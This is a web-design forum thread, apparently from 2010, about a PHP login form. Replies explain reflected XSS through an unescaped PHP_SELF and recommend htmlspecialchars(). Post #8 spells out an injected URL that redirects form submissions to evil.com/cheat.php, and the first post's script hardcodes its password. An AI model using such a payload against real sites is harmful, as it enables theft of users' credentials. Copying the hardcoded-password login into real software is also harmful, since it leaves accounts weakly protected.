The Web Design Group

... Making the Web accessible to all.

> Question with <form action= > and PHP
hikzero
post Jan 8 2010, 04:57 PM
Post #1





Group: Members
Posts: 5
Joined: 6-January 10
Member No.: 10,779



Hi. I've decided to make a simple log in script, with PHP since people have said Javascript sucks for security.

I got all of it down except in the part where the PHP comes in.

I have



<div class="form_specs">
<table>
<td>
<form action="check_details()" method="post">
<center>Your name: <input type="text" name="name" size="20" /></center>
<br />
<br />
<center>Passcode: <input type="password" name="pass" size="20" /></center>
<br />
<br />
<center><input type="submit" value="Log in" /></center>
</form>
</td>
</table>

But it won't call the PHP function! I have made the php script within the same html file that code is in. This is my php:



CODE
<?php

function check_details()
{
$given_pass = $_POST["pass"];
$correct_pass = "sameer";

if ( $given_pass == $correct_pass ) {
    echo "Correct Password!";
    sleep(5);
    header( 'Location:http://www.swaghelp321.webege.com/personal.html');
} else {
    echo "Incorrect Password.";
    echo "You will be redirected back to this login in 5 seconds.";
    sleep(5);
    header( 'Location:http://www.swaghelp321.webege.com/main_login.html');
}
}
?>


As far as I can tell it's perfect for determining if the password is correct or incorrect.

This is my whole file's code.

main_login.html

CODE
<html>
<head><title>title here</title>
</head>



<?php

function check_details()
{
$given_pass = $_POST["pass"];
$correct_pass = "sameer";

if ( $given_pass == $correct_pass ) {
    echo "Correct Password!";
    sleep(5);
    header( 'Location:http://www.swaghelp321.webege.com/personal.html');
} else {
    echo "Incorrect Password.";
    echo "You will be redirected back to this login in 5 seconds.";
    sleep(5);
    header( 'Location:http://www.swaghelp321.webege.com/main_login.html');
}
}
?>


<style type="text/css">

.form_specs
{
border: 1px solid black;
padding:10px;
position:fixed;
top:120px;
left:500px;
width:200px;
background-color:orange
}

</style>

<body bgcolor="black">

<div class="form_specs">
<table>
<td>
<form action="check_details()" method="post">
<center>Your name: <input type="text" name="name" size="20" /></center>
<br />
<br />
<center>Passcode:      <input type="password" name="pass" size="20" /></center>
<br />
<br />
<center><input type="submit" value="Log in" /></center>
</form>
</td>
</table>


</body>
</html>


This post has been edited by hikzero: Jan 8 2010, 04:59 PM
Christian J
post Jan 8 2010, 06:05 PM
Post #2



Group: WDG Moderators
Posts: 9,653
Joined: 10-August 06
Member No.: 7



The form's ACTION must point to the file where the script is, like

CODE
action="main_login.html"


Since in this case both the form and script are in the same file you can simply use an empty ACTION value:

CODE
action=""


BTW, many sites recommend using something like this:

CODE
action="<?php echo $_SERVER['PHP_SELF'];?>"

but I don't think that should be necessary. See also http://www.thefutureoftheweb.com/blog/use-...bmit-to-current
Brian Chandler
post Jan 9 2010, 02:22 AM
Post #3


Jocular coder

Group: Members
Posts: 2,460
Joined: 31-August 06
Member No.: 43



The first thing you have to sort out in your head (grok!) is *where* various things are happening.

Any PHP function can only be called by another bit of PHP program, and all PHP programs run on your server.

What the user does on her browser is happening inside her computer; this can include running javascript, jiggling around with what's happening in the browser.

For something on the browser to affect what's going on on the server it must send an HTTP request for another document -- typically by using a form.

If you make your form correctly call the function which redirects to the desired page if the password matches, this will "work". But it won't prevent anyone simply accessing the page directly; and if it's interesting, someone will mention it on their blog, and lots of people will look. Why do you need a login?? If you really do, it is probably simpler to use HTTP simple authentication [google].
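Added example, not part of any post in this thread: one way to combine the empty ACTION from post #2 with the point in post #3 that the check has to happen on the server before the protected content is sent. The file name members.php, the sample passcode and the session key logged_in are assumptions; password_hash() needs PHP 5.5 or later.

```php
<?php
// members.php (hypothetical file name): login form and protected content in
// one file, so the content is only ever sent after the server-side check.
session_start();

// Assumption: a real site loads a stored hash from config or a database.
// It is computed here only to keep the example self-contained.
$stored_hash = password_hash('example-passcode', PASSWORD_DEFAULT);

$error = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $given = (isset($_POST['pass']) && is_string($_POST['pass'])) ? $_POST['pass'] : '';
    if (password_verify($given, $stored_hash)) {
        session_regenerate_id(true);       // new session id once logged in
        $_SESSION['logged_in'] = true;
        header('Location: members.php');   // headers go out before any output
        exit;
    }
    $error = 'Incorrect password.';
}

if (empty($_SESSION['logged_in'])) {
    // Not logged in: send the form and stop, so nothing below is emitted.
    ?>
<!DOCTYPE html>
<html>
<head><title>Log in</title></head>
<body>
<p><?php echo htmlspecialchars($error, ENT_QUOTES, 'UTF-8'); ?></p>
<form action="" method="post">
<p>Passcode: <input type="password" name="pass" size="20" /></p>
<p><input type="submit" value="Log in" /></p>
</form>
</body>
</html>
    <?php
    exit;
}
?>
<!DOCTYPE html>
<html>
<head><title>Personal page</title></head>
<body><p>Protected content goes here.</p></body>
</html>
```

Requesting the file directly without a session only ever returns the form, because the script exits before the protected markup.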
hikzero
post Jan 9 2010, 04:23 AM
Post #4





Group: Members
Posts: 5
Joined: 6-January 10
Member No.: 10,779



I don't want my cousin accessing a certain file on my site :)
Christian J
post Jul 6 2010, 06:56 AM
Post #5



Group: WDG Moderators
Posts: 9,653
Joined: 10-August 06
Member No.: 7



QUOTE(Christian J @ Jan 9 2010, 01:05 AM) *

BTW, many sites recommend using something like this:

CODE
action="<?php echo $_SERVER['PHP_SELF'];?>"

but I don't think that should be necessary.

When using $_SERVER[PHP_SELF] malicious users can insert code into the web page through the query string, unless $_SERVER[PHP_SELF] is properly sanitized. See http://phpsecurity.wordpress.com/2007/11/0...er-of-php_self/
Brian Chandler
post Jul 6 2010, 09:22 AM
Post #6


Jocular coder

Group: Members
Posts: 2,460
Joined: 31-August 06
Member No.: 43



QUOTE(Christian J @ Jul 6 2010, 08:56 PM) *

QUOTE(Christian J @ Jan 9 2010, 01:05 AM) *

BTW, many sites recommend using something like this:

CODE
action="<?php echo $_SERVER['PHP_SELF'];?>"

but I don't think that should be necessary.

When using $_SERVER[PHP_SELF] malicious users can insert code into the web page through the query string, unless $_SERVER[PHP_SELF] is properly sanitized. See http://phpsecurity.wordpress.com/2007/11/0...er-of-php_self/


The page you linked to makes no sense. If bits of html can be inserted into a page like this it must be a problem with the (wordpress??) script.

For example, my phpinfo page shows the value of PHP_SELF as "/shop/.../phpinfo.php". Well, none of the characters in that string will be changed in the slightest by applying the htmlentities() function. And if the action parameter in the form is "/shop/.../phpinfo.php" (for example), it makes no difference whether this string was typed as a literal, or echoed as the $_SERVER variable.

So perhaps there is some problem here, but I think it is not relevant. I think that when I have a page submitting to itself, I have always written the (relative) url in the action=, which seems the most robust way to do it.
Christian J
post Jul 7 2010, 01:21 PM
Post #7



Group: WDG Moderators
Posts: 9,653
Joined: 10-August 06
Member No.: 7



QUOTE(Brian Chandler @ Jul 6 2010, 04:22 PM) *

The page you linked to makes no sense. If bits of html can be inserted into a page like this it must be a problem with the (wordpress??) script.

No it's not wordpress. Here's a small demo:

CODE

<?php
$this_page="example1.html";

echo "<p>Click on the link to create malicious URL</p>\n";
echo "<p><a href=\"$this_page/%3Ch1%3EXSS%3C/h1%3E\">$this_page/%3Ch1%3EXSS%3C/h1%3E
</a></p>\n";
echo '<p>Sanitized: '.htmlspecialchars($_SERVER['PHP_SELF'])."</p>\n";
echo '<p>Not sanitized: '.$_SERVER['PHP_SELF'];
?>

The above inserts an H1 element with the text "XSS" (you must of course change the value of $this_page to your own test page's name).

QUOTE
For example, my phpinfo page shows the value of PHP_SELF as "/shop/.../phpinfo.php".

You need to append the "malicious" part also. With a URL like this:

CODE
/phpinfo.php/%3Ch1%3EXSS%3C/h1%3E

My offline system returns this value for _SERVER["PHP_SELF"] in the browser: /phpinfo.php/<h1>XSS</h1>

My web host somehow changes the "<" and ">" characters though, so phpinfo returns this value for _SERVER["PHP_SELF"] in the browser: ?h1?XSS?/h1?


This post has been edited by Christian J: Jul 7 2010, 01:53 PM
Brian Chandler
post Jul 8 2010, 02:33 PM
Post #8


Jocular coder

Group: Members
Posts: 2,460
Joined: 31-August 06
Member No.: 43



Oh, right. Sorry, I was being a bit dim, though it would have helped if the article gave a valid example. What you want to be in the trick URL is

something.com/logonpage.php/"></form><form method=post action="evil.com/cheat.php

so the victim's form entry gets sent somewhere else. Anyway, yes, you should always use htmlspecialchars().
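Added example, not part of any post in this thread: it builds the form tag from the PHP_SELF values quoted in posts #6 to #8, with and without htmlspecialchars(), and parses the result to show what ends up in the ACTION attribute. The function names are hypothetical and the PHP_SELF strings are constructed samples, so it runs from the command line without a web server.

```php
<?php
// Added example; run with the PHP CLI (needs the DOM extension).
// The PHP_SELF values are constructed to match the URLs quoted in the thread.

function form_tag_raw($php_self) {        // the pattern quoted in post #2
    return '<form method="post" action="' . $php_self . '">';
}

function form_tag_escaped($php_self) {    // with htmlspecialchars() applied
    return '<form method="post" action="'
         . htmlspecialchars($php_self, ENT_QUOTES, 'UTF-8') . '">';
}

// Parse the markup with an HTML parser and return every form's action value.
function form_actions($form_tag) {
    libxml_use_internal_errors(true);     // keep parser warnings quiet
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $form_tag . '</form></body></html>');
    $actions = array();
    foreach ($doc->getElementsByTagName('form') as $form) {
        $actions[] = $form->getAttribute('action');
    }
    return $actions;
}

$samples = array(
    '/phpinfo.php',
    '/phpinfo.php/<h1>XSS</h1>',
    '/logonpage.php/"></form><form method=post action="evil.com/cheat.php',
);

foreach ($samples as $php_self) {
    $raw = form_actions(form_tag_raw($php_self));
    $esc = form_actions(form_tag_escaped($php_self));
    echo "PHP_SELF: $php_self\n";
    printf("  raw:     %d form(s): %s\n", count($raw), implode(' | ', $raw));
    printf("  escaped: %d form(s): %s\n\n", count($esc), implode(' | ', $esc));
}
```

With the raw tag the third sample parses as two forms, the second one pointing at the other host, while the escaped tag always yields a single form whose action is the literal path. The `<h1>` sample stays inside the quoted attribute, which is why it only shows up as markup when PHP_SELF is echoed into body text as in post #7.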
